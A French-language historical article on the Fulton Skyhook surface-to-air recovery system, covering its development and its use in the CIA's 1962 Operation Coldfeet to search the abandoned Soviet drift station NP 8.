Un B-17 modifié avec le système Skyhook, similaire à celui utilisé lors de l’opération Coldfeet. Source originale : http://www.dhc-2.com/id386.htm

1.3. Un bref aperçu du processus de recouvrement

1. Sécurisation adéquate du chargement : le personnel et les objets doivent être équipés du matériel approprié pour permettre leur récupération. Le personnel a reçu des harnais complets, déjà reliés au câble et au ballon ( source ). Le centre de gravité de l’objet correspond au point de fixation du câble et du ballon ( source ).
2. Gonflage du ballon : Le ballon serait gonflé jusqu’à une altitude de 150 mètres (500 pieds) au-dessus du sol ( source ). Le fil de nylon serait alors suspendu dans les airs ( source ).
3. Préparation de l’appontage au sol : le personnel s’asseyait au sol, dos au vent ( source ). Simultanément, il éclairait les aéronefs en approche à l’aide de lampes torches afin de les guider ( source ).
4. Préparation de l’enlèvement en vol : les pilotes effectuaient plusieurs passages préparatoires au-dessus de la cargaison afin de déterminer la trajectoire d’approche optimale ( source ). Une fois la trajectoire choisie, l’aéronef s’approchait à basse vitesse, en visant un indicateur orange situé à 130 mètres (425 pieds) le long du câble ( source ).
5. Récupération et accrochage : Au contact du câble, l’ancre aérienne bloque la charge pour éviter toute oscillation dangereuse ( source ). L’aéronef cabre immédiatement, ce qui entraîne le passage du câble sous l’appareil ( source ). L’équipage récupère le câble, le fixe à un treuil et le remonte à bord ( source ).
6. 

2.0. Histoire du Skyhook

La récupération de colis en vol trouve ses origines dans les années 1920. La société All American Aviation a mis au point une méthode consistant à placer un chargement de courrier entre deux poteaux ( source ). Un câble était tendu entre les poteaux et attaché au chargement ( source ). Un avion volant perpendiculairement aux poteaux s’approchait à 150 km/h, remorquant un câble d’acier muni d’un grappin ( source ). Au contact du câble, l’avion cabrait ( source ). Des amortisseurs amortissaient la force générée, et l’équipage remontait le colis à l’aide d’un treuil ( source ).

Durant la Seconde Guerre mondiale, les Alliés occidentaux ont constaté la nécessité de récupérer rapidement hommes et matériel par voie aérienne ( source ). Le système mis au point par All American Aviation a été utilisé ( source ). La Grande-Bretagne et les États-Unis ont récupéré des planeurs et du personnel grâce à cette méthode, démontrant ainsi son utilité dans les contextes militaires et d’espionnage ( source ).

Essais de récupération humaine en vol, utilisant un prototype du Skyhook.

2.1. Expériences d’après-guerre

La fin de la guerre n’a pas sonné le glas de l’idée de récupération en vol. La CIA et l’Armée de l’air ont continué d’expérimenter ce concept ( source ). La CIA a utilisé la méthode « All-American » pendant la guerre de Corée pour récupérer des hommes et du matériel servant à établir des réseaux de résistance en Mandchourie ( source ). En 1950, l’inventeur Robert Edison Fulton Jr. a commencé à perfectionner ce procédé de manière indépendante ( source ). Il a commencé à utiliser des ballons-sondes pour suspendre un fil de nylon au lieu de s’appuyer sur des paires de poteaux ( source ). Fulton a mené plusieurs expériences avant de finalement capturer une charge légère ( source ). Il a envoyé des preuves photographiques de cette capture à Luis de Florez, directeur de la recherche technique à la CIA ( source ). Suite à cela, l’Office of Naval Research a contacté Fulton ( source ). Il a rapidement obtenu un contrat pour développer davantage le système ( source ).

2.2. Développement et perfectionnement

Fulton commença ses travaux à El Centro, en Californie, en 1950 ( source ). À bord d’un PV-2 Neptune de l’US Navy, il survola le désert du Colorado pour poursuivre ses expérimentations sur son nouveau système ( source ). Le développement fut long et difficile. Fulton identifia deux problèmes : la composition du câble pour éviter sa rupture et son ancrage afin d’empêcher tout mouvement dangereux de l’objet capturé. Les tests démontrèrent que le nylon tressé à haute résistance à la traction était le matériau optimal ( source ). Le système d’ancrage aérien consistait à canaliser le câble vers un point central, puis à le verrouiller ( source ). Une fois l’ancrage réussi, le câble passait sous l’avion, et l’équipage sécurissait et remontait la charge ( source ). Selon Fulton, la conception de l’ancrage aérien fut la partie la plus complexe du développement du système ( source ).

2.3. Tests

Les premiers essais ont été réalisés avec des mannequins ( source ). Leur succès ayant été confirmé, des essais avec des sujets vivants ont été entrepris. Le premier fut un cochon ( source ). Malheureusement pour ce dernier, il se mit à tournoyer frénétiquement lors de sa capture, tandis que l’équipage le ramenait à bord de l’avion ( source ). Bien que toujours en sécurité, cet incident désorienta considérablement l’animal ( source ). Les premiers essais sur des humains, en 1958, permirent de résoudre ce problème ( source ). Le sergent-chef Levi Woods, du Corps des Marines des États-Unis, réussit à se faire remonter à bord grâce au Skyhook ( source ). Il évita la désorientation en écartant les bras et les jambes pendant la remontée ( source ). Suite à cela, les essais furent transférés à la base aérienne d’Eglin, en Floride, le 1er août 1959 ( source ). C’est là que le projet fut finalisé et baptisé du nom de son inventeur.

3.0. Opération Pieds Froids

En 1960, le Skyhook a permis de récupérer des échantillons archéologiques et géologiques dans des sites reculés d’Alaska ( source ). Bien qu’indéniablement utile, une opération de la CIA dans le cercle arctique révélerait la véritable utilité de ce système.

3.1. Context

En mai 1961, des avions de l’US Navy, en mission de reconnaissance, repérèrent la station dérivante soviétique abandonnée NP 9 ( source ). Les deux camps de la Guerre froide avaient établi des stations dérivantes pour étudier les conditions arctiques ( source ). Ces stations, utilisées pour des recherches isolées sur la banquise, étaient régulièrement abandonnées par les deux puissances en raison des conditions environnementales ( source ). La CIA y vit une opportunité. En explorant la structure abandonnée, elle pourrait recueillir des renseignements précieux sur les capacités scientifiques et militaires soviétiques ( source ). Des préparatifs furent rapidement entrepris pour accéder à la banquise ( source ).

3.2. Pourquoi Skyhook ?

La distance rendait le transport par hélicoptère impossible, et son emplacement au cœur de la calotte glaciaire arctique impraticable pour une approche par brise-glace ( source ). Le système de récupération sol-air Fulton était la seule option pour récupérer rapidement le personnel envoyé en mission. La CIA prévoyait de lancer l’opération en septembre ( source ).

Carte originale de la CIA détaillant l’opération Coldfeet (mai-juin 1962). Source originale : https://apps.dtic.mil/sti/pdfs/ADA528051.pdf

3.2. Sélection des enquêteurs

Deux hommes furent sélectionnés pour l’opération. Le major James Smith, de l’USAF, était un parachutiste décoré ayant également servi dans des stations dérivantes américaines en Arctique ( source ). De plus, il était linguiste spécialisé en russe ( source ). Le lieutenant Leonard A. LeSchack, de la réserve de l’US Navy, était un géophysicien spécialiste de l’Antarctique qui avait lui aussi participé à l’établissement de postes d’écoute en Arctique ( source ). LeSchack suivit un stage de parachutisme à la base aéronavale de Lakehurst afin d’obtenir sa qualification ( source ). Par la suite, les deux hommes s’entraînèrent intensivement sur le Skyhook tout au long de l’été ( source ).

3.3. Retards bureaucratiques

Au sommet de la hiérarchie de la Marine, les planificateurs de la mission peinaient à convaincre les autorités de l’utilité de l’opération ( source ). Finalement, les opposants donnèrent leur feu vert à l’opération Coldfeet, mais seulement fin septembre ( source ). Ce retard retarda considérablement les essais en conditions hivernales du Skyhook. De plus, ces essais révélèrent des défauts dans la conception existante, défauts qu’il fallut corriger ( source ). La CIA suspendit le projet jusqu’au printemps 1962 ( source ).

3.4. Un changement de programme

En mars, la CIA reçut des informations selon lesquelles une autre station de dérive soviétique avait été abandonnée ( source ). La station NP 8 disposait d’équipements plus perfectionnés que la station NP 9 et constituait donc une cible de choix ( source ). Le 4 mai 1962, un avion américain effectuant une mission de reconnaissance repéra la station NP 8 ( source ). L’objectif de la mission fut officiellement modifié suite à cette découverte ( source ).

3.5. L’opération

Le 28 mai, Smith et LeSchack furent parachutés sur la base NP 8 ( source ). Ils disposaient de 72 heures pour explorer la base, collecter des documents et prendre des photographies ( source ). De ce point de vue, l’opération fut un succès retentissant. Les renseignements recueillis permirent aux analystes de déterminer que les stations dérivantes soviétiques étaient capables de fonctionner silencieusement pendant de longues périodes ( source ). Les Soviétiques avaient manifestement compris l’importance des travaux acoustiques dans l’Arctique ( source ). Cela impliquait également que les stations dérivantes soviétiques pouvaient servir de postes d’écoute ( source ). De plus, l’opération démontra que la recherche environnementale soviétique dans l’Arctique était plus avancée que celle menée en Occident ( source ). L’opération permit de collecter 68 kg de documents, de films et d’échantillons ( source ).

3.6. Récupération

La récupération de Smith et LeSchack a été retardée d’une journée en raison d’une mauvaise visibilité, les avions de reconnaissance n’ayant pas pu localiser la station NP 8 ( source ). Le 1er juin, des avions américains ont repéré la station dérivante et les opérations de récupération ont été lancées ( source ). Les conditions météorologiques sont restées mauvaises et la surface de la banquise n’était pas idéale pour le Skyhook. Le vent soufflait à 30 nœuds ( source ). Après avoir gonflé leurs ballons, les deux hommes ont été traînés sur la glace jusqu’à ce qu’ils soient stoppés par des obstacles naturels ( source ). Heureusement, les opérations de récupération se sont déroulées sans autre incident. Le B-17 modifié a effectué trois passages pour récupérer l’équipe : un premier pour le chargement, puis un passage pour chacun des enquêteurs ( source ).

Le commandant James Smith savoure un whisky « médicinal » après avoir été remorqué avec succès à bord du B-17. Le lieutenant Leonard A. LeSchack est présent dans le coin inférieur droit. Source originale : https://apps.dtic.mil/sti/pdfs/ADA528051.pdf

3.7. Succès opérationnel

Au-delà de la simple fourniture de renseignements précieux, l’opération Coldfeet a démontré l’utilité du système de récupération sol-air Fulton ( source ). Même dans des conditions difficiles, le succès de l’opération a prouvé que Skyhook pouvait atteindre et mener des opérations de renseignement dans des zones traditionnellement inaccessibles ( source ).

4.0. Tomber en disgrâce

Malgré le succès de l’opération Coldfeet, le développement des hélicoptères à long rayon d’action et du ravitaillement en vol a sonné le glas du Skyhook en tant que système essentiel ( source ). Dans les années 1960, de nouveaux hélicoptères tels que le Sikorsky HH-3E Jolly Green Giant et le Boeing CH-47 Chinook ont ​​pris le relais pour la récupération de personnel en territoire hostile ( source ). Le HH-3E, par exemple, était capable de réaliser un vol sans escale entre New York et Paris ( source ). Les appareils modifiés pour le Skyhook sont restés en service dans les forces armées américaines jusqu’en 1996, date à laquelle ils ont été mis hors service ou stockés ( source ).

5.0. Conclusion

Le système de récupération Fulton sol-air est un concept unique, conçu pour une époque bien précise. Bien que les hélicoptères aient aujourd’hui remplacé son utilisation principale, le Skyhook offre un aperçu fascinant des techniques de l’époque. La culture populaire s’en est inspirée pour de nombreux projets. Le film « The Dark Knight » (2008) met en scène une extraction par Skyhook à Hong Kong ( source ). Les jeux « Metal Gear Solid V » et « PlayerUnknown’s Battlegrounds » intègrent le Skyhook comme mécanique de jeu ( source ).